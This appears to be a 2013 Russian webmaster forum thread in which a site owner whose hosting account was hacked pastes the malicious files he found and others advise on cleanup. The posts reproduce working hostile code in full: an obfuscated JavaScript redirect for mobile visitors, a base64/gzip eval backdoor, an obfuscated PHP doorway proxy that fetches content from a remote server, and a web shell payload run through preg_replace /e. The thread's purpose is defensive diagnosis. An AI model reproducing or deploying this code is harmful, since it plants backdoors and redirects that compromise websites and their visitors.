Взломы на мастерхост

123
КВ
На сайте с 02.07.2012
Offline
47
#11

Скопируйте код .htaccess пожалуйста, который вставляют, буду очень признателен. Можно в ПМ

/ru/forum/774117

Ruslan203
На сайте с 23.03.2006
Offline
99
#12
Кот в сапогах:
Скопируйте код .htaccess пожалуйста, который вставляют, буду очень признателен. Можно в ПМ

/ru/forum/774117

Я его потер, но так как часто меня взламывают, я думаю скоро пришлю:)

---------- Добавлено 11.03.2013 в 22:41 ----------

Еще нашел подозрительны файл counter.html с содержимым:

<script type="text/javascript">
l=~[];l={___:++l,$$$$:(![]+"")[l],__$:++l,$_$_:(![]+"")[l],_$_:++l,$_$$:({}+"")[l],$$_$:(l[l]+"")[l],_$$:++l,$$$_:(!""+"")[l],$__:++l,$_$:++l,$$__:({}+"")[l],$$_:++l,$$$:++l,$___:++l,$__$:++l};l.$_=(l.$_=l+"")[l.$_$]+(l._$=l.$_[l.__$])+(l.$$=(l.$+"")[l.__$])+((!l)+"")[l._$$]+(l.__=l.$_[l.$$_])+(l.$=(!""+"")[l.__$])+(l._=(!""+"")[l._$_])+l.$_[l.$_$]+l.__+l._$+l.$;l.$$=l.$+(!""+"")[l._$$]+l.__+l._+l.$+l.$$;l.$=(l.___)[l.$_][l.$_];l.$(l.$(l.$$+"\""+"\\"+l.__$+l.$_$+l.__$+l.$$$$+"(\\"+l.__$+l.$_$+l.$$_+l.$_$_+"\\"+l.__$+l.$$_+l.$$_+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$__+l.$$$+l.$_$_+l.__+l._$+"\\"+l.__$+l.$$_+l._$_+"."+l._+"\\"+l.__$+l.$$_+l._$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.___+l.__$+"\\"+l.__$+l.$__+l.$$$+l.$$$_+"\\"+l.__$+l.$_$+l.$$_+l.__+".\\"+l.__$+l.$_$+l.$_$+l.$_$_+l.__+l.$$__+"\\"+l.__$+l.$_$+l.___+"(/("+l.$_$_+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+"\\"+l.__$+l.$$_+l._$_+l._$+"\\"+l.__$+l.$_$+l.__$+l.$$_$+"|\\"+l.__$+l.$_$+l.$_$+"\\"+l.__$+l.$_$+l.__$+l.$$_$+"\\"+l.__$+l.$$_+l.___+"|\\"+l.__$+l.$_$+l._$_+l._$_+"\\"+l.__$+l.$_$+l.$_$+l.$$$_+"|\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$$$+l.__$+"\\"+l.__$+l.$_$+l.$_$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+l.$_$_+"\\"+l.__$+l.$_$+l.$$_+"|\\"+l.__$+l.$$_+l._$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$_$+l.__$+l.$$$_+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+l.$$_+l.___+"|\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$$$+l.__$+"\\"+l.__$+l.$_$+l.$_$+l.$_$$+l._$+"\\"+l.__$+l.$$_+l._$$+"|\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+"\\"+l.__$+l.$_$+l.$_$+l._$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+l.$$$_+"|\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+l.$$__+l.$$$_+"|\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$$_+l.___+l.$$__+"|\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$_$+l.$_$+l.$_$_+"\\"+l.__$+l.$$_+l._$_+l.__+"\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$_$+l.___+l._$+"\\"+l.__$+l.$_$+l.$$_+l.$$$_+"|"+l.$_$$+(![]+"")[l._$_]+l.$_$_+l.$$__+"\\"+l.__$+l.$_$+l._$$+l.$_$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$$$+l.__$+"|\\"+l.__$+l.$_$+l.$_$+l.__+"\\"+l.__$+l.$_$+l._$$+"|\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$$_+l._$$+"\\"+l.$__+l.___+"\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$_$+l.___+l._$+"\\"+l.__$+l.$_$+l.$$_+l.$$$_+")/\\"+l.__$+l.$_$+l.__$+")!==\\"+l.__$+l.$_$+l.$$_+l._+(![]+"")[l._$_]+(![]+"")[l._$_]+"){\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l._$_+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l.$_$+l.__$+l.$$$$+"("+l.$$_$+l._$+l.$$__+l._+"\\"+l.__$+l.$_$+l.$_$+l.$$$_+"\\"+l.__$+l.$_$+l.$$_+l.__+".\\"+l.__$+l.$$_+l._$_+l.$$$_+l.$$$$+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"\\"+l.__$+l.$$_+l._$_+l.$$$_+"\\"+l.__$+l.$$_+l._$_+".\\"+l.__$+l.$_$+l.$_$+l.$_$_+l.__+l.$$__+"\\"+l.__$+l.$_$+l.___+"(/(\\"+l.__$+l.$$$+l.__$+l.$_$_+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l.$$$_+"\\"+l.__$+l.$$$+l.___+"|\\"+l.__$+l.$__+l.$$$+l._$+l._$+"\\"+l.__$+l.$__+l.$$$+(![]+"")[l._$_]+l.$$$_+"|\\"+l.__$+l.$$_+l._$_+l.$_$_+"\\"+l.__$+l.$_$+l.$_$+l.$_$$+(![]+"")[l._$_]+l.$$$_+"\\"+l.__$+l.$$_+l._$_+"|\\"+l.__$+l.$_$+l.$_$+l.$_$_+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+")/\\"+l.__$+l.$_$+l.__$+")!==\\"+l.__$+l.$_$+l.$$_+l._+(![]+"")[l._$_]+(![]+"")[l._$_]+"){\\"+l.__$+l._$_+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l.$$_+l.$$$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+l.$$_$+l._$+"\\"+l.__$+l.$$_+l.$$$+"."+(![]+"")[l._$_]+l._$+l.$$__+l.$_$_+l.__+"\\"+l.__$+l.$_$+l.__$+l._$+"\\"+l.__$+l.$_$+l.$$_+"\\"+l.$__+l.___+"=\\"+l.$__+l.___+"\\\"\\"+l.__$+l.$_$+l.___+l.__+l.__+"\\"+l.__$+l.$$_+l.___+"://\\"+l.__$+l.$_$+l.$_$+l._$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+l.$$$_+"-"+(![]+"")[l._$_]+l._$+l.$_$_+l.$$_$+"\\"+l.__$+l.$_$+l.__$+"\\"+l.__$+l.$_$+l.$$_+"\\"+l.__$+l.$__+l.$$$+"."+l.$$__+l._$+"\\"+l.__$+l.$_$+l.$_$+"/\\"+l.__$+l.$_$+l.$_$+l._$+l.$_$$+"\\"+l.__$+l.$_$+l.__$+(![]+"")[l._$_]+"/\\"+l.__$+l.$__+l.$$$+l._$+".\\"+l.__$+l.$$_+l.___+"\\"+l.__$+l.$_$+l.___+"\\"+l.__$+l.$$_+l.___+"?\\"+l.__$+l.$$_+l._$$+"\\"+l.__$+l.$_$+l.__$+l.$$_$+"="+l._$$+"\\\";\\"+l.__$+l._$_+"\\"+l.$__+l.___+"\\"+l.$__+l.___+"}\\"+l.$__+l.___+"\\"+l.$__+l.___+"\\"+l.__$+l._$_+"}"+"\"")())();
</script>



---------- Добавлено 11.03.2013 в 23:11 ----------

И еще вот такое:


<?php

eval ( gzuncompress ( base64_decode ( 'eNqNUVFKw0AQ/VbwDiNItxFNq0bbKtX+KAjeQGTZJBsTTdqSjaIRwSr+iTfwDlUUimi9wu6NnE0CIm1EFnZ3Zt68eTOzEKbQBhbH7BKqYGzNzS6g5xBImFKfCZ/AEcaJ12o2ueMyq9V0rOb6muV5dWvNXq23PNuz3XXyK9Fhjs+pG8R5Nn66LOJVSvf2D3YpNcAEUiN4T9SaQuMFIc95SgqUkumImUGnyUuCqOCtAlmpE1gEsoGPnsHcbOChW5em/CIQiUCrTJgBlQp0tBVpzj+R2xgtQAYsQ5kmA8+VljHDHb+Xk9NjnlCn10149285mf5r4KHgBUnWzDwEQo9sSmoxSF21E52iVQ7JyGd+oi5LWD7FznF61nV6UT/mQuvr2EzwDYu63Om5uuGpXRA/SfqbtdqJMMN0WfD4nMemHaS1nWKP7dLVVtAUScxZ1F5ZtVok018IzDrOC/bP/jO2JZjs6WcL+RomEHmtX6POkUQ+yTc5ls/qHu9XOZIfcgzqTg3UrRzKT3S+yJG6VQ8gv9QNul7kEOqNRgMwOASdgu43+Y74Mf5G6hHUQHMM0Ic2pmFEfpikEJEt/RsxZD9U' ) ) );

?>
Создание, продвижение сайтов (http://www.gendesign.ru) +7 (495) 5072151, icq: 915-109
IL
На сайте с 20.04.2007
Offline
435
#13
Ruslan203:
И еще вот такое:
<?php

eval ( gzuncompress ( base64_decode ( ...
?>

Ruslan203:
А если у меня страницы все статичные? Нет там никакого *.php ?

Так есть PHP? Или нету? Вы прежде чем обвинять хостера со своими файлами разберитесь.. посмотрите grep-ом.. или скриптом готовым

При этом утечку через локальный комп исключать нельзя...

... :) Облачные серверы от RegRu - промокод 3F85-3D10-806D-7224 ( http://levik.info/regru )
Ruslan203
На сайте с 23.03.2006
Offline
99
#14

Есть еще код сапы

f988ecda498c48534ff043b209fbfbd5
по нему можно будет вычислить злоумышленника?

---------- Добавлено 11.03.2013 в 23:17 ----------

ivan-lev:
Так есть PHP? Или нету? Вы прежде чем обвинять хостера со своими файлами разберитесь.. посмотрите grep-ом.. или скриптом готовым

У меня нет php, но ручками покопался в папках и нашел такой файлик javascript.php

Есть какие то команды для поиска файлов с расширением php ?

Den73
На сайте с 26.06.2010
Offline
523
#15
Ruslan203:

У меня нет php, но ручками покопался в папках и нашел такой файлик javascript.php
Есть какие то команды для поиска файлов с расширением php ?


find / -type f -name '*.php'
Ruslan203
На сайте с 23.03.2006
Offline
99
#16
Den73:

find / -type f -name '*.php'

Спасибо! Проверяю

---------- Добавлено 12.03.2013 в 00:01 ----------

Чем дальше в лес тем глубже болото еще такое:

<? $GLOBALS['_746949050_']=Array(base64_decode('c3RyX'.'3JlcGxhY2U='),base64_decode('dHJp'.'bQ=='),base64_decode('ZGlybmFtZQ='.'='),base64_decode('b2JfY2xlYW4'.'='),base64_decode('c3RybmN'.'hc2VjbXA='),base64_decode('Y3VybF'.'9'.'pbml'.'0'),base64_decode('b'.'XlzcW'.'xfY2'.'xvc2U'.'='),base64_decode('Y3Vy'.'bF9zZXR'.'vcH'.'Q='),base64_decode(''.'dXJsZGVjb'.'2'.'Rl'),base64_decode('Y3VybF9zZXRvcHQ='),base64_decode(''.'c'.'3Rycn'.'Bvcw'.'=='),base64_decode('c'.'3RycmN'.'oc'.'g'.'=='),base64_decode('Y'.'3'.'VybF'.'9'.'l'.'eGVj'),base64_decode('Zml'.'sZV'.'9wd'.'XRfY'.'29udG'.'V'.'u'.'dH'.'M='),base64_decode(''.'Y'.'3'.'VybF'.'9jbG9'.'zZQ=='),base64_decode(''.'aGVhZG'.'Vy'),base64_decode('c3RycnBv'.'cw=='),base64_decode('c3Vic3'.'Ry'),base64_decode('c3'.'Ry'.'d'.'G9'.'r'),base64_decode('c3RydG9'.'sb3'.'dl'.'cg=='),base64_decode(''.'YXJyYXlfa'.'2'.'V5X2V4aXN'.'0cw=='),base64_decode('aGVhZGV'.'y'),base64_decode('aGV'.'hZGVy'),base64_decode('a'.'W'.'1'.'hZ2'.'Vj'.'cmVhdGVm'.'cm'.'9'.'tc'.'G5n'),base64_decode('cHJpbnRfcg='.'='),base64_decode(''.'a'.'GVhZGVy')); ?><? function _807846770($i){$a=Array('NS42MS40MS4xNzI=','dG9ycmVud'.'G1hdHJpeC5jb20=',''.'MT'.'Y=','L'.'w==','Og==','U0NSSVBU'.'X0'.'5BTUU=','Og==','SFRU'.'UF9I'.'T'.'1'.'NU','JnV'.'y'.'bD0'.'=','dXRmL'.'Tg'.'=','bmFma'.'2c=','Y3Nz',''.'cG5n','aW1hZ2U'.'vcG5n',''.'anBn',''.'aW1'.'hZ2UvanBl'.'Z'.'w==','anBlZw==',''.'a'.'W1hZ2Uva'.'nBlZw'.'==','Z2lm',''.'aW'.'1hZ2UvZ2'.'lm','a'.'nM=',''.'dGV4dC9'.'qY'.'XZhc2N'.'yaXB0','eG'.'1s','dGV4'.'dC94bW'.'w'.'=','c3dm','YXB'.'wbGljY'.'XRpb'.'24'.'veC'.'1za'.'G9ja3dh'.'dm'.'UtZm'.'xhc2g=',''.'dX'.'J'.'s',''.'U3RhdHVzOiA0MDQgTm'.'90IEZvdW5k',''.'Lg==',''.'Q29u'.'dGVu'.'dC1EZXNjc'.'mlw'.'dGlvbjog'.'RmlsZ'.'SB'.'UcmFu'.'c2Zl'.'cg==','Q'.'29'.'udG'.'VudC1UcmFuc2'.'Zlci1Fb'.'mNv'.'ZGluZ'.'zog'.'Y'.'m'.'l'.'uYXJ5');return base64_decode($a[$i]);} ?><?php $_0=_807846770(0);$_1=_807846770(1);$_2=_807846770(2);$_3=round(0+1000+1000);$_4=$GLOBALS['_746949050_'][0](_807846770(3),_807846770(4),$GLOBALS['_746949050_'][1]($GLOBALS['_746949050_'][2]($_SERVER[_807846770(5)]))) ._807846770(6);$_5="http://$_0/get.proxy?t=$_1&k=$_2&c=$_3&dir=$_4&host=" .$_SERVER[_807846770(7)] ._807846770(8);$_6=_807846770(9);if((round(0+989+989+989+989+989)+round(0+1810+1810))>round(0+989+989+989+989+989)|| $GLOBALS['_746949050_'][3]($_2,$_7));else{$GLOBALS['_746949050_'][4]($_8);}$_9="text/html; charset=$_6";$_10=_807846770(10);$_8=array(_807846770(11)=>"text/css; charset=$_6",_807846770(12)=> _807846770(13),_807846770(14)=> _807846770(15),_807846770(16)=> _807846770(17),_807846770(18)=> _807846770(19),_807846770(20)=> _807846770(21),_807846770(22)=> _807846770(23),_807846770(24)=> _807846770(25));$_7=$_REQUEST[_807846770(26)];$_11=round(0+1669+1669);$_12=$GLOBALS['_746949050_'][5]();while(round(0+930.2+930.2+930.2+930.2+930.2)-round(0+2325.5+2325.5))$GLOBALS['_746949050_'][6]($_13,$_12,$_6);$GLOBALS['_746949050_'][7]($_12,10002,$_5 .$GLOBALS['_746949050_'][8]($_7));$GLOBALS['_746949050_'][9]($_12,19913,round(0+1));if((round(0+2496+2496)+round(0+865.4+865.4+865.4+865.4+865.4))>round(0+1248+1248+1248+1248)|| $GLOBALS['_746949050_'][10]($_6));else{$GLOBALS['_746949050_'][11]($_3,$_14,$_0);}$_15=$GLOBALS['_746949050_'][12]($_12);while(round(0+236+236+236)-round(0+236+236+236))$GLOBALS['_746949050_'][13]($_16,$_REQUEST,$_REQUEST);$GLOBALS['_746949050_'][14]($_12);$_17=round(0+224+224+224+224+224);if(!$_15){$GLOBALS['_746949050_'][15](_807846770(27));die();}$_18=$GLOBALS['_746949050_'][16]($_7,_807846770(28));$_14=$GLOBALS['_746949050_'][17]($_7,$_18+round(0+0.25+0.25+0.25+0.25),round(0+249.75+249.75+249.75+249.75));while(round(0+1374)-round(0+343.5+343.5+343.5+343.5))$GLOBALS['_746949050_'][18]($_6,$_3);$_13=$GLOBALS['_746949050_'][19]($_14);$_16=$GLOBALS['_746949050_'][20]($_13,$_8)?$_8[$_13]:$_9;$GLOBALS['_746949050_'][21]("Content-Type: $_16");$GLOBALS['_746949050_'][22](_807846770(29));if((round(0+473+473)+round(0+29.666666666667+29.666666666667+29.666666666667))>round(0+189.2+189.2+189.2+189.2+189.2)|| $GLOBALS['_746949050_'][23]($_5,$_0));else{$GLOBALS['_746949050_'][24]($_4,$_18,$_13);}$GLOBALS['_746949050_'][25](_807846770(30));echo $_15; ?>



---------- Добавлено 12.03.2013 в 00:02 ----------

И вот такое:

<?php
$auth_pass = "a8c7bfbbf4b3c1696c0fb305e5baab1a";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b3Nehu30jC4tq4C6vCkyZiiSMr2cSiRkixLthxbcvRjO7H8MU2ySXbUZDH4zsEp4QASgyI96fHXVgRTg+PjzhA5AzdCcwIyt3xph4+mS3bmNzFdNJUaq6B3RAEf4q15mgx4+h6EZaCbEw5aH42KJgjontpF5Y8MkOX9xCd4DMznufRRUEKXA8v5vBrCRNCi/VlgNmnbv9wOgxssuNKqyUdoUtYREmqRX3H97t4Xu5ioSLIzRUyBv3/AA=='\x29\x29\x29\x3B",".");?>
firstman
На сайте с 08.01.2010
Offline
173
#17

Нужно смериться с тем, что все сайты и почти каждый их файл заражены кусками js и прочей нечистью.

1) Нужно вылечить свой компьютер и удалить все ФТП клиентами хотя бы на время

2) Слить все файлы и один за другим руками и поиском вычистить лишний код их сайтов.

3) Обновить все CMS и залить все обратно

Супер IP и Proxy для работы c SEO и другими задачами (http://www.primeproxy.net)!
6666
На сайте с 10.01.2005
Offline
505
#18
Ruslan203:
А если у меня страницы все статичные?

Пофиг. Они же выполняются как ПХП. Или вирус в джипеге. Или еще где-то. Мне на статику вешали вирус только в путь. Лечите, хостер не при делах. Сюда, короче: /ru/forum/774117

Каждое мое сообщение проверила и одобрила Елена Летучая. (c) Для меня очень важно все что Вы говорите! (http://surrealism.ru/123.mp3) .
Ruslan203
На сайте с 23.03.2006
Offline
99
#19

По ходу дела у меня на многих сайтах стояли мини движки Dle

$server = "5.61.41.172"; //адрес сервера с фермой сайтов

$template = "mixsoftware.ru"; //указываем имя шаблона
$key = "40"; //указываем ID темы ключей
$keyCount = 2998; //указываем сколько ключей использовать для дорвея

$dirSite = str_replace("/", ":", trim(dirname($_SERVER["SCRIPT_NAME"]))) . ":";
$host = "http://$server/get.proxy?t=$template&k=$key&c=$keyCount&dir=$dirSite&host=".$_SERVER["HTTP_HOST"]."&url=";



---------- Добавлено 12.03.2013 в 02:47 ----------

Кот в сапогах:
Скопируйте код .htaccess пожалуйста, который вставляют, буду очень признателен. Можно в ПМ

/ru/forum/774117

вот нашел то что было в js:

<script type="text/javascript">

<!--

if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i)!==null){

window.location = "http://qr-update.com/u/4270";

}

//-->

</script>

6666
На сайте с 10.01.2005
Offline
505
#20

Ruslan203, тем более, если много сайтов. Понятно, что в статике сложно спрятать вирус. Но они ползают с сайта на сайт в доли секунды.

Будете чистить - только все сайты сразу, иначе никакого результата.

123

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий